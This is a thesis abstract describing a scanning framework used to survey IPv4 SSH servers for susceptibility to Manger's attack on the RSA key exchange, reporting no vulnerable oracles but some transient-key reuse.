Abstract:
Secure Shell (SSH) is a widely used cryptographic protocol that provides, for example, confidentiality to messages exchanged between a client and server. To achieve this confidentiality, key material needs to be exchanged via the internet, an insecure channel. One method of exchanging key material in SSH-2 is the Rivest-ShamirAdleman (RSA) key exchange. It relies on an encryption scheme called RSAESOAEP that is built upon Optimal Assymetric Encryption Padding (OAEP). For this key exchange, an RSA public key, referred to as transient public key, is required. The client uses this public key to encrypt a shared secret that is used to generate the key material. In 2001, an attack against RSAES-OAEP, called Manger’s attack, has been discovered that can, decrypt a message encrypted with RSAES-OAEP. The attack requires an oracle that, given a ciphertext, answers to the attacker if it starts with a 00 byte or not. When applied to SSH, this attack can lead to the recovery of the shared secret and, hence, the key material used for a connection, enabling an attacker to decrypt all messages exchanged during that connection. Although this attack is known for over 20 years, no large-scale analysis has ever been performed to find out whether there exist vulnerable servers in the SSH ecosystem. In this thesis, we present an extensible scanning framework for SSH that is a novelty for the SSH ecosystem. We use this framework to implement a server scanner that executes tests against a server to analyze if it has the properties required to be vulnerable to Manger’s attack. To validate our tests, we create vulnerable servers using the open-source SSH framework AsyncSSH with different kinds of oracles. Furthermore, we use the server scanner to perform a complete analysis of the IPv4 address space on the default SSH port, port 22, and one additional port, port 7547, where public SSH servers were discovered. In our analysis, we did not discover any servers that have the oracle required to execute Manger’s attack. We, however, found hosts that reuse the transient public key for multiple RSA key exchanges and some that use their host key for the key exchanges. Both of these findings do not immediately lead to attacks, but can pose a security risk, if a private key belonging to a transient public key is compromised.